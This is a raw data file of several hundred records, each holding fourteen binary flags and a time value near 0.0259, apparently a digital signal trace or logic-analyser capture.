0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5858692e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5858720e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5858772e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5858796e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5858844e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5858868e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5858876e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5858892e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5858924e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5858948e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5858968e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5858996e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5859020e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5859024e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5859044e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5859068e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5859076e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5859124e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5859148e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5859196e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5859220e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5859268e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5859292e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5859300e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5859320e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5859348e-02 0,0,1,0,1,1,0,0,0,0,0,0,0,0,2.5859352e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5859356e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5859368e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5859396e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5859420e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5859444e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5859468e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5859492e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5859524e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5859548e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5859568e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5859596e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5859620e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5859644e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5859668e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5859692e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5859724e-02 0,0,1,0,1,0,0,0,0,1,0,0,0,0,2.5859748e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5859752e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5859772e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5859796e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5859804e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5859844e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5859872e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5859924e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5859948e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5859996e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5860020e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5860072e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5860096e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5860100e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5860124e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5860148e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5860156e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5860172e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5860196e-02 0,0,1,0,1,0,0,0,0,1,0,0,0,0,2.5860200e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5860204e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5860220e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5860244e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5860252e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5860300e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5860324e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5860372e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5860396e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5860444e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5860468e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5860520e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5860544e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5860548e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5860568e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5860596e-02 0,0,1,0,1,1,0,0,0,0,0,0,0,0,2.5860600e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5860604e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5860620e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5860644e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5860668e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5860692e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5860716e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5860744e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5860768e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5860796e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5860820e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5860844e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5860868e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5860892e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5860916e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5860944e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5860968e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5860996e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5861020e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5861044e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5861068e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5861092e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5861116e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5861144e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5861168e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5861196e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5861220e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5861244e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5861268e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5861292e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5861316e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5861344e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5861368e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5861396e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5861420e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5861444e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5861468e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5861492e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5861516e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5861544e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5861568e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5861596e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5861620e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5861644e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5861668e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5861692e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5861716e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5861744e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5861768e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5861796e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5861820e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5861844e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5861868e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5861892e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5861916e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5861944e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5861968e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5861996e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5862020e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5862044e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5862068e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5862092e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5862116e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5862144e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5862148e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,1,2.5985912e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,2.5986096e-02 1,0,1,0,1,1,0,0,0,1,0,1,0,1,2.5986124e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,2.5986148e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,1,2.5986456e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,2.5986484e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,1,2.5986508e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,2.5986532e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,1,2.5986556e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,2.5986580e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,1,2.5986604e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,2.5986632e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,1,2.5986656e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,2.5986684e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,1,2.5986708e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,2.5986732e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,1,2.5986740e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5986744e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5986756e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5986780e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5986808e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5986832e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5986836e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5986856e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5986884e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5986908e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5986932e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5986956e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5986980e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5987004e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5987032e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5987056e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5987084e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5987088e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5987108e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5987132e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5987156e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5987180e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5987188e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5987204e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5987232e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5987256e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5987284e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5987308e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5987332e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5987356e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5987380e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5987388e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5987404e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5987432e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5987456e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5987484e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5987508e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5987532e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5987540e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5987556e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5987580e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5987604e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5987632e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5987656e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5987684e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5987708e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5987732e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5987736e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5987756e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5987780e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5987788e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5987804e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5987832e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5987856e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5987884e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5987908e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5987932e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5987936e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5987956e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5987980e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5988004e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5988032e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5988056e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5988084e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5988088e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5988108e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5988132e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5988156e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5988180e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5988204e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5988232e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5988236e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5988256e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5988284e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5988308e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5988332e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5988356e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5988380e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5988404e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5988432e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5988436e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5988456e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5988484e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5988508e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5988532e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5988536e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5988556e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5988580e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5988588e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5988604e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5988632e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5988656e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5988684e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5988708e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5988732e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5988756e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5988780e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5988788e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5988804e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5988832e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5988836e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5988856e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5988884e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5988932e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5988956e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5989008e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5989032e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5989084e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5989108e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5989156e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5989180e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5989232e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5989256e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5989308e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5989332e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5989356e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5989380e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5989404e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5989432e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5989436e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5989456e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5989484e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5989508e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5989532e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5989556e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5989580e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5989604e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5989632e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5989656e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5989684e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5989688e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5989708e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5989732e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5989756e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5989780e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5989788e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5989804e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5989832e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5989856e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5989884e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5989908e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5989932e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5989956e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5989980e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5989988e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5990004e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5990032e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5990056e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5990084e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5990108e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5990132e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5990156e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5990180e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5990188e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5990204e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5990232e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5990256e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5990284e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5990308e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5990332e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5990340e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5990356e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5990380e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5990404e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5990432e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5990484e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5990508e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5990556e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5990580e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5990632e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5990656e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5990708e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5990732e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5990780e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5990804e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5990860e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5990884e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5990908e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5990932e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5990956e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5990980e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5990988e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5991004e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5991032e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5991056e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5991084e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5991108e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5991132e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5991156e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5991180e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5991188e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5991204e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5991232e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5991256e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5991284e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5991308e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5991332e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5991336e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5991356e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5991380e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5991404e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5991428e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5991456e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5991480e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5991504e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5991532e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5991536e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5991556e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5991580e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5991604e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5991628e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5991680e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5991704e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5991756e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5991780e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5991828e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5991856e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5991904e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5991932e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5991980e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5992004e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5992060e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5992080e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5992104e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5992132e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5992156e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5992180e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5992204e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5992228e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5992256e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5992280e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5992304e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5992332e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5992356e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5992380e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5992404e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5992432e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5992456e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5992484e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5992508e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5992532e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5992556e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5992580e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5992604e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5992632e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5992656e-02 